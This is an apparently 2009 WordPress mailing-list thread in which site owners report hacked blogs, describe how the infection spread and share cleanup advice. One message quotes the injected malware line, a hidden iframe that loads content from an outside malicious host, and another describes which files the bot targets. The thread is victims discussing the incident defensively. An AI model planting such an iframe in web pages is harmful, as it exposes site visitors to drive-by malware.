Change your pwds and scan away.. I used cpanel file manager for a while to make sure they stopped attacking .. looking at logs, it hits and is tagged with googlebot, but the IP's are strange
Anyway, This virus looks for files with: index*.* default*.* main*.* home*.* (I built a static php includes site, and only files named like the above were affected) Also might want to check your CGI-BIN for files that look suspicious It's basically is a bot that logs in, finds any files in all directories that start with the above ...funny thing was that somtimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the <? tags :) -Chris 314media.com On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh <[email protected]>wrote: > Yeah..my Wordpress mu install also got hacked. Just confirmed. > > On Fri, Jul 24, 2009 at 2:48 AM, dinu<[email protected]> wrote: > > I had to restore from backup. the entire blog > > when I first saw Default.widgets.php hacked, I tried restoring only that > > page. But then I found hidden iframe codes on all of my pages ( including > > pages after login ) > > > > when I contacted Dreamhost support, they said it was an ftp hack. So, I > > would think its not a wordpress issue. > > > > On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh <[email protected] > >wrote: > > > >> 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 > >> > >> On Fri, Jul 24, 2009 at 2:31 AM, Joshua > >> Dunbar<[email protected]> wrote: > >> > What version of wordpress are you running? > >> > > >> > -------------------------------------------------- > >> > From: "Chris Carter" <[email protected]> > >> > Sent: Thursday, July 23, 2009 3:43 PM > >> > To: <[email protected]> > >> > Cc: <[email protected]>; < > [email protected]> > >> > Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? > >> > > >> >> I keep getting hacked with that code inserted into > admin/default-filters > >> >> > >> >> Chris Carter > >> >> President > >> >> 314media.com > >> >> 314-714-5448 > >> >> > >> >> On Jul 23, 2009, at 3:31 PM, Navjot Singh <[email protected]> > >> wrote: > >> >> > >> >>> I have a blog running on 2.8.2 and suddenly now I find all index.php > >> >>> and wp-includes/Default.widgets.php hacked with following code > >> >>> inserted randomly : > >> >>> > >> >>> <iframe src="http://u1j.in:8080/ts/in.cgi?pepsi109"; width=125 > >> >>> height=125 style="visibility: hidden"></iframe> > >> >>> > >> >>> How to prevent further hacking? I am currently replacing all the > files > >> >>> affected since all of them affected at a certain date. I am on a > >> >>> shared hosting and only one blog got attacked. > >> >>> > >> >>> Regards > >> >>> Navjot Singh > >> >>> _______________________________________________ > >> >>> wp-testers mailing list > >> >>> [email protected] > >> >>> http://lists.automattic.com/mailman/listinfo/wp-testers > >> >> > >> >> _______________________________________________ > >> >> wp-testers mailing list > >> >> [email protected] > >> >> http://lists.automattic.com/mailman/listinfo/wp-testers > >> > > >> > _______________________________________________ > >> > wp-testers mailing list > >> > [email protected] > >> > http://lists.automattic.com/mailman/listinfo/wp-testers > >> > > >> _______________________________________________ > >> wp-testers mailing list > >> [email protected] > >> http://lists.automattic.com/mailman/listinfo/wp-testers > >> > > > > > > > > -- > > With Love > > Dinu > > > > http://chromestory.com > > http://offlineblog.net > > _______________________________________________ > > wp-testers mailing list > > [email protected] > > http://lists.automattic.com/mailman/listinfo/wp-testers > > > _______________________________________________ > wp-testers mailing list > [email protected] > http://lists.automattic.com/mailman/listinfo/wp-testers > _______________________________________________ wp-testers mailing list [email protected] http://lists.automattic.com/mailman/listinfo/wp-testers
